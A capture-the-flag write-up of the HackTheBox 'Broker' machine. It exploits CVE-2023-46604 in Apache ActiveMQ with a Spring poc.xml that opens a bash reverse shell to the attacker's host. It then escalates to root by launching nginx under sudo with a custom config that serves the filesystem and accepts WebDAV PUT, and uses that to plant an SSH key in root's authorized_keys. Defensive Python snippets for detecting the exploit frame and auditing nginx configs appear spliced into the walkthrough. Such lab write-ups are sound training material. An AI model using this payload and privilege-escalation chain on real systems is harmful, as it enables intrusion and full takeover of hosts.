Broker-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory traversal, CVE-2023-46604, loading a custom nginx configuration, uploading a personal public key via PUT

Reference: https://0xdf.gitlab.io/2023/11/09/htb-broker.html
Reference: https://heapbytes.gitbook.io/notes/rooms/hackthebox/easy/broker
Reference: https://fismathack.github.io/hackthebox/broker/index.html
Reference: https://stackoverflow.com/questions/16912270/how-do-i-allow-a-put-file-request-on-nginx-server

0x01 Obtaining user access

1. First, start the target machine and get its IP address: Target IP Address : 10.10.11.243

2. Start openvpn to connect to the lab's internal network.

┌──(kali㉿kali)-[~/桌面/HTB-VPN]
└─$ sudo openvpn lab_shiyan.ovpn
[sudo] kali 的密码:
2023-11-29 10:52:17 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.

3. Check whether the host can be pinged.

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.11.243 -c 4
PING 10.10.11.243 (10.10.11.243) 56(84) bytes of data.
64 bytes from 10.10.11.243: icmp_seq=1 ttl=63 time=271 ms
64 bytes from 10.10.11.243: icmp_seq=2 ttl=63 time=269 ms
64 bytes from 10.10.11.243: icmp_seq=3 ttl=63 time=385 ms
64 bytes from 10.10.11.243: icmp_seq=4 ttl=63 time=307 ms

--- 10.10.11.243 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3006ms
rtt min/avg/max/mdev = 269.155/308.148/385.357/47.087 ms

4. Use nmap to port-scan the target and see which services are open.

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sV -sC -oN braker-allports 10.10.11.243
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-29 10:56 CST
Nmap scan report for 10.10.11.243
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Index of /
| http-ls: Volume /
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| - 06-Nov-2023 01:10 bin/
| - 06-Nov-2023 01:10 bin/X11/
| 963 17-Feb-2020 14:11 bin/NF
| 129576 27-Oct-2023 11:38 bin/VGAuthService
| 51632 07-Feb-2022 16:03 bin/%5B
| 35344 19-Oct-2022 14:52 bin/aa-enabled
| 35344 19-Oct-2022 14:52 bin/aa-exec
| 31248 19-Oct-2022 14:52 bin/aa-features-abi
| 14478 04-May-2023 11:14 bin/add-apt-repository
| 14712 21-Feb-2022 01:49 bin/addpart
|_
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.64 seconds

5. The nmap scan shows two web services. Port 80 is an authenticated application: opening it immediately prompts for a username and password.

6. Port 8080 serves a page with a directory traversal vulnerability.


8. It feels like something is missing, so rerun a full port scan.

┌──(kali㉿kali)-[~/桌面]
└─$ nmap -sCV -p- 10.10.11.243 -min-rate=500
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-29 11:31 CST
Nmap scan report for 10.10.11.243
Host is up (0.27s latency).
Not shown: 65524 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
1337/tcp open http nginx 1.18.0 (Ubuntu)
| http-ls: Volume /
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| - 06-Nov-2023 01:10 bin/
| - 06-Nov-2023 01:10 bin/X11/
| 963 17-Feb-2020 14:11 bin/NF
| 129576 27-Oct-2023 11:38 bin/VGAuthService
| 51632 07-Feb-2022 16:03 bin/%5B
| 35344 19-Oct-2022 14:52 bin/aa-enabled
| 35344 19-Oct-2022 14:52 bin/aa-exec
| 31248 19-Oct-2022 14:52 bin/aa-features-abi
| 14478 04-May-2023 11:14 bin/add-apt-repository
| 14712 21-Feb-2022 01:49 bin/addpart
|_
|_http-title: Index of /
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp open mqtt
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp open amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
| AMQP
| AMQP
| amqp:decode-error
|_ 7Connection from client using unsupported AMQP attempted
8080/tcp open http nginx 1.18.0 (Ubuntu)
| http-ls: Volume /
| maxfiles limit reached (10)
| SIZE TIME FILENAME
| - 06-Nov-2023 01:10 bin/
| - 06-Nov-2023 01:10 bin/X11/
| 963 17-Feb-2020 14:11 bin/NF
| 129576 27-Oct-2023 11:38 bin/VGAuthService
| 51632 07-Feb-2022 16:03 bin/%5B
| 35344 19-Oct-2022 14:52 bin/aa-enabled
| 35344 19-Oct-2022 14:52 bin/aa-exec
| 31248 19-Oct-2022 14:52 bin/aa-features-abi
| 14478 04-May-2023 11:14 bin/add-apt-repository
| 14712 21-Feb-2022 01:49 bin/addpart
|_
|_http-title: Index of /
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: nginx/1.18.0 (Ubuntu)
8161/tcp open http Jetty 9.4.39.v20210325
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ basic realm=ActiveMQRealm
44981/tcp open tcpwrapped
61613/tcp open stomp Apache ActiveMQ
| fingerprint-strings:
| HELP4STOMP:
| ERROR
| content-type:text/plain
| message:Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
| org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
| org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
| org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
| org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
| org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_ java.lang.Thread.run(Thread.java:750)
61614/tcp open http Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
61616/tcp open apachemq ActiveMQ OpenWire transport
| fingerprint-strings:
| NULL:
| ActiveMQ
| TcpNoDelayEnabled
| SizePrefixDisabled
| CacheSize
| ProviderName
| ActiveMQ
| StackTraceEnabled
| PlatformDetails
| Java
| CacheEnabled
| TightEncodingEnabled
| MaxFrameSize
| MaxInactivityDuration
| MaxInactivityDurationInitalDelay
| ProviderVersion
|_ 5.15.15
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

9. The host runs an ActiveMQ service, version 5.15.15. Use this information to look up whether known vulnerabilities exist.

10. Check with searchsploit, which ships with Kali.

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit ActiveMQ

------------------------------------------- ---------------------------------

Exploit Title | Path

------------------------------------------- ---------------------------------

ActiveMQ < 5.14.0 - Web Shell Upload (Meta | java/remote/42283.rb
Apache ActiveMQ 5.11.1/5.13.2 - Directory | windows/remote/40857.txt
Apache ActiveMQ 5.2/5.3 - Source Code Info | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' | multiple/remote/33905.txt
Apache ActiveMQ 5.x-5.11.1 - Directory Tra | windows/remote/48181.rb

------------------------------------------- ---------------------------------

Shellcodes: No Results

11. There are some results, but let's also search Google to see whether a recent vulnerability gives direct RCE.

12. There is indeed something; read the details here: https://www.prio-n.com/blog/cve-2023-46604-attacking-defending-ActiveMQ

13. While researching CVE-2023-46604, we found the login credentials for the site's authentication in the directory listing and tried logging in.
http://10.10.11.243:8080/opt/apache-activemq-5.15.15/conf/users.properties

14. Nothing of real value was found there, but we found an exploit on GitHub.

https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell

16. Download it and try it locally.

┌──(kali㉿kali)-[~/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master]
└─$ python3 exploit.py -i 10.10.11.243 -p 61616 -si 10.10.14.86 -sp 8080
#################################################################################

# CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell #

# Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d #

#################################################################################

[*] Target: 10.10.11.243:61616
[*] Serving XML at: http://10.10.14.86:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################

# Not yet connected, send a command to test connection to host. #

# Prompt will change to Apache ActiveMQ$ once at least one response is received #

# Please note this is a one-off connection check, re-run the script if you #

# want to re-check the connection. #

#################################################################################

[Target not responding!]$ ls
Traceback (most recent call last):
File "/home/kali/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master/exploit.py", line 172, in <module>
main(args.ip, args.port, args.srvip, args.srvport)
File "/home/kali/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master/exploit.py", line 48, in main
execute(ip, port, srvip, srvport, command, url)
File "/home/kali/桌面/CVE-2023-46604-ActiveMQ-RCE-pseudoshell-master/exploit.py", line 59, in execute
conn.connect((ip, port))
OSError: [Errno 113] No route to host

17. Overall it didn't work well; try another one.
https://github.com/evkl1d/CVE-2023-46604

18. This one also didn't work well and produced no response; move on to the next one.

https://github.com/X1r0z/ActiveMQ-RCE

19. Modify the poc.xml in that tool as follows:

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg >
            <list>
                <value>bash</value>
                <value>-c</value>
                <value>bash -i &gt;&amp; /dev/tcp/10.10.14.86/10086 0&gt;&amp;1</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

20. Start a web server so the target can fetch this poc file remotely.

┌──(kali㉿kali)-[~/桌面/ActiveMQ-RCE-main]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.243 - - [29/Nov/2023 15:19:36] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [29/Nov/2023 15:19:36] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [29/Nov/2023 15:21:20] "GET /poc.xml HTTP/1.1" 200 -
10.10.11.243 - - [29/Nov/2023 15:21:21] "GET /poc.xml HTTP/1.1" 200 -

21. Set up an nc listener to receive the reverse shell.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...

22. Run the exploit.

┌──(kali㉿kali)-[~/桌面/ActiveMQ-RCE-main]
└─$ go run main.go -i 10.10.11.243 -u http://10.10.14.86:8000/poc.xml
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|

[*] Target: 10.10.11.243:61616
[*] XML URL: http://10.10.14.86:8000/poc.xml

[*] Sending packet: 000000721f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001f687474703a2f2f31302e31302e31342e38363a383030302f706f632e786d6c
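The hex in the "Sending packet" line above is an OpenWire ExceptionResponse frame in loose encoding, which is exactly what broker-side detection can key on. The following added example (not code from this writeup or from the tools it uses) decodes that frame and flags the CVE-2023-46604 signature: an "exception" class that is not a Throwable, carrying a URL as its message. SAMPLE_FRAME_HEX is copied from the line above; the trusted-package heuristic in is_cve_2023_46604_attempt is my own assumption.

```python
import struct

# OpenWire command type for ExceptionResponse; CVE-2023-46604 abuses its Throwable field.
EXCEPTION_RESPONSE = 0x1F

# The class used by the PoC on this page. Patched brokers refuse to instantiate
# anything that is not a Throwable, so any non-exception class here is suspicious.
KNOWN_GADGET_CLASSES = {
    "org.springframework.context.support.ClassPathXmlApplicationContext",
}

# Frame copied from the "[*] Sending packet:" line above (split only for line length).
SAMPLE_FRAME_HEX = (
    "000000721f000000000000000000010100"
    "426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f7274"
    "2e436c61737350617468586d6c4170706c69636174696f6e436f6e74657874"
    "01001f687474703a2f2f31302e31302e31342e38363a383030302f706f632e786d6c"
)


def _read_loose_string(frame, pos):
    """Loose encoding: 1-byte not-null flag, then Java writeUTF (2-byte big-endian
    length + bytes). Returns (value or None, offset after the string)."""
    if frame[pos] == 0:
        return None, pos + 1
    (length,) = struct.unpack_from(">H", frame, pos + 1)
    start, end = pos + 3, pos + 3 + length
    if end > len(frame):
        raise ValueError("string runs past end of frame")
    return frame[start:end].decode("utf-8"), end


def parse_exception_response(frame):
    """Decode a loose-encoded ExceptionResponse frame into its fields."""
    (size,) = struct.unpack_from(">I", frame, 0)
    if size != len(frame) - 4:
        raise ValueError(f"size field {size} != payload length {len(frame) - 4}")
    if frame[4] != EXCEPTION_RESPONSE:
        raise ValueError(f"not an ExceptionResponse: type 0x{frame[4]:02x}")
    (command_id,) = struct.unpack_from(">i", frame, 5)    # bytes 5..8
    response_required = bool(frame[9])
    (correlation_id,) = struct.unpack_from(">i", frame, 10)  # bytes 10..13
    class_name = message = None
    if frame[14]:  # throwable not-null flag, then class name and message strings
        class_name, pos = _read_loose_string(frame, 15)
        message, pos = _read_loose_string(frame, pos)
    return {"command_id": command_id, "response_required": response_required,
            "correlation_id": correlation_id, "class_name": class_name, "message": message}


def is_cve_2023_46604_attempt(parsed):
    """Flag a known gadget class, or (heuristic) any class outside the JDK/ActiveMQ
    packages whose 'message' is a URL the gadget constructor would fetch."""
    cls = parsed["class_name"] or ""
    msg = (parsed["message"] or "").lower()
    if cls in KNOWN_GADGET_CLASSES:
        return True
    trusted = cls.startswith(("java.", "javax.", "org.apache.activemq."))
    return not trusted and msg.startswith(("http://", "https://", "file:"))
```

Running parse_exception_response on bytes.fromhex(SAMPLE_FRAME_HEX) recovers the Spring class name and the poc.xml URL, the two values that a real broker exception would never combine.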

23. We successfully get a shell as the current user.

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.86] from (UNKNOWN) [10.10.11.243] 34844
bash: cannot set terminal process group (906): Inappropriate ioctl for device
bash: no job control in this shell
activemq@broker:/opt/apache-activemq-5.15.15/bin$

activemq@broker:/opt/apache-activemq-5.15.15/bin$ id
id
uid=1000(activemq) gid=1000(activemq) groups=1000(activemq)

24. Grab the current user's user.txt.

activemq@broker:/opt/apache-activemq-5.15.15/bin$ cd ~
cd ~
activemq@broker:~$ pwd
pwd
/home/activemq
activemq@broker:~$ ls
ls
user.txt
activemq@broker:~$ cat user.txt
cat user.txt
763274ed5f8c681b1afad93f6e0e3498
activemq@broker:~$

0x02 Obtaining root access

25. Spawn an interactive shell with Python.

python3 -c 'import pty;pty.spawn("/bin/bash")'

activemq@broker:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
activemq@broker:~$ ls
ls
user.txt
activemq@broker:~$

26. As usual, check whether the user has any sudo privileges.

activemq@broker:~$ sudo -l
sudo -l
Matching Defaults entries for activemq on broker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User activemq may run the following commands on broker:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
activemq@broker:~$

27. We can run /usr/sbin/nginx as root. Following HTB's guided mode, the intent is to create a web service that runs with root privileges.

What is the full path of the binary that the activemq user can run with sudo as any other user?
/usr/sbin/nginx

Which nginx directive can be used to define the allowed WebDAV methods?
dav_methods

Which HTTP method is used to write files via the WebDAV protocol?
PUT

Which flag is used to make nginx load a custom configuration by specifying a file?
-c

28. From searching we know the standard way to create a configuration file; first create an empty .conf file.

activemq@broker:~$ cd /tmp
cd /tmp
activemq@broker:/tmp$ ls
ls
activemq@broker:/tmp$ touch exp.conf
touch exp.conf
activemq@broker:/tmp$ ls
ls
poc.conf

29. Then write the default configuration into poc.conf by base64-encoding it locally and decoding it on the target. Since we are not logged in over SSH, editing directly with vim in this shell easily causes errors.

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1337;
        root /;
        autoindex on;
    }
}

dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM3OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICB9Cn0=

30. Use the following command to write the file into poc.conf.

echo dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM3OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICB9Cn0= | base64 -d > poc.conf

activemq@broker:/tmp$ echo dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM3OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICB9Cn0= | base64 -d > poc.conf
<dXRvaW5kZXggb247CiAgICB9Cn0= | base64 -d > poc.conf
activemq@broker:/tmp$ cat poc.conf
cat poc.conf
user root;
events {
worker_connections 1024;
}
http {
server {
listen 1337;
root /;
autoindex on;
}
}

31. Start nginx with our custom configuration and read root.txt.

activemq@broker:/tmp$ sudo /usr/sbin/nginx -c /tmp/poc.conf     
sudo /usr/sbin/nginx -c /tmp/poc.conf
activemq@broker:/tmp$ curl localhost:1337/root/root.txt
curl localhost:1337/root/root.txt
11eecdc53b331488c5104d18605059fd
activemq@broker:/tmp$

32. This isn't the end yet: we still need a root shell. From the guided-mode keywords dav_methods and PUT, we can infer that the approach is to upload our public key and then log in over SSH.

33. Regenerate poc.conf:

user root;
events {
    worker_connections 1024;
}
http {
    server {
        listen 1338;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}

dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM4OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICAgICAgZGF2X21ldGhvZHMgUFVUOwogICAgfQp9

echo dXNlciByb290OwpldmVudHMgewogICAgd29ya2VyX2Nvbm5lY3Rpb25zIDEwMjQ7Cn0KaHR0cCB7CiAgICBzZXJ2ZXIgewogICAgICAgIGxpc3RlbiAxMzM4OwogICAgICAgIHJvb3QgLzsKICAgICAgICBhdXRvaW5kZXggb247CiAgICAgICAgZGF2X21ldGhvZHMgUFVUOwogICAgfQp9 | base64 -d > poc.conf

34. Load the regenerated configuration. Compared to the previous one, the port is changed to avoid a conflict that would prevent it from loading.

sudo /usr/sbin/nginx -c /tmp/poc.conf
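The settings the guided-mode questions point at (user root, root /, autoindex on, dav_methods PUT, all loaded through nginx -c under a NOPASSWD sudo rule) are what a configuration review or a sudoers audit should catch. The following added example, which is not part of this writeup, parses an nginx configuration and reports exactly those settings; WRITEUP_CONF is the configuration above, and the parser handles only the unquoted directive syntax used there.

```python
import re

# The privileged config this writeup loads with `sudo /usr/sbin/nginx -c` (from the page).
WRITEUP_CONF = """user root;
events { worker_connections 1024; }
http {
    server {
        listen 1338;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
"""

# Token: a comment (ignored), a structural character, or a bare word.
_TOKEN = re.compile(r"#[^\n]*|([{};])|([^\s{};#]+)")
WEBDAV_WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}


def parse_nginx(text):
    """Parse nginx syntax into nested (name, args, children) tuples (unquoted only)."""
    stack, words = [[]], []
    for m in _TOKEN.finditer(text):
        punct, word = m.group(1), m.group(2)
        if word:
            words.append(word)
        elif punct in (";", "{"):
            if not words:
                raise ValueError(f"'{punct}' without a directive name")
            node = (words[0], words[1:], [])
            stack[-1].append(node)
            if punct == "{":
                stack.append(node[2])  # descend into the new block
            words = []
        elif punct == "}":
            stack.pop()
    if len(stack) != 1 or words:
        raise ValueError("unterminated block or directive")
    return stack[0]


def _walk(directives):
    for name, args, children in directives:
        yield name, args
        yield from _walk(children)


def audit(text):
    """List settings that turn a root-launched nginx into a file primitive: root workers
    plus root / plus autoindex give arbitrary read; dav_methods PUT adds arbitrary write."""
    findings = []
    for name, args in _walk(parse_nginx(text)):
        if name == "user" and args[:1] == ["root"]:
            findings.append("workers run as root")
        elif name == "root" and args == ["/"]:
            findings.append("whole filesystem served")
        elif name == "autoindex" and args == ["on"]:
            findings.append("directory listing enabled")
        elif name == "dav_methods" and WEBDAV_WRITE_METHODS & set(args):
            findings.append("WebDAV write methods: " + " ".join(args))
    return findings
```

The underlying fix is not in the config file at all: any `sudo nginx` rule that accepts `-c` lets the caller supply all of these directives, so the sudoers entry itself is the finding.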

35. Generate a key pair on the Kali machine.

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t rsa -b 2048
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Q0 kali@kali
The key's randomart image is:
+---[RSA 2048]----+
|+**...oXO*. |
|+=+= .++E.+ |
|o.oo. ooo . |
| ....+ .o . . |
| . =o S. o |
| ..o. .. |
| .o . |
|. .. . |
|++. |
+----[SHA256]-----+


┌──(kali㉿kali)-[~/.ssh]
└─$ ls
id_rsa id_rsa.pub known_hosts known_hosts.old

36. Check whether the authorized_keys file exists on the remote host.

activemq@broker:/tmp$ curl localhost:1338/root/.ssh/
curl localhost:1338/root/.ssh/
<html>

<head><title>Index of /root/.ssh/</title></head>

<body>

<h1>Index of /root/.ssh/</h1><hr><pre><a href="../">../</a>

<a href="authorized_keys">authorized_keys</a> 27-Apr-2023 16:07 0
</pre><hr></body>
</html>

37. Use the PUT method to upload our local public key to the server.

┌──(kali㉿kali)-[~/.ssh]
└─$ curl -X PUT http://10.10.11.243:1338/root/.ssh/authorized_keys \
--upload-file ~/.ssh/id_rsa.pub

38. Check again whether the upload succeeded.

activemq@broker:/tmp$ curl localhost:1338/root/.ssh/
curl localhost:1338/root/.ssh/
<html>

<head><title>Index of /root/.ssh/</title></head>

<body>

<h1>Index of /root/.ssh/</h1><hr><pre><a href="../">../</a>

<a href="authorized_keys">authorized_keys</a> 29-Nov-2023 08:28 391
</pre><hr></body>
</html>
activemq@broker:/tmp$

39. The timestamp has updated, so the upload succeeded. Next, log in over SSH.

┌──(kali㉿kali)-[~]
└─$ ssh root@10.10.11.243
The authenticity of host '10.10.11.243 (10.10.11.243)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.243' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Wed Nov 29 08:29:24 AM UTC 2023

System load: 0.16015625
Usage of /: 70.4% of 4.63GB
Memory usage: 12%
Swap usage: 0%
Processes: 162
Users logged in: 0
IPv4 address for eth0: 10.10.11.243
IPv6 address for eth0: dead:beef::250:56ff:feb9:c464


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

root@broker:~#
root@broker:~# pwd
/root
root@broker:~# ls
cleanup.sh root.txt
root@broker:~#

0x03 Proof of completion

https://www.hackthebox.com/achievement/machine/1705469/578


Broker-htb-writeup
https://sh1yan.top/2023/11/30/Broker-htb-writeup/
Author: shiyan
Published: 2023-11-30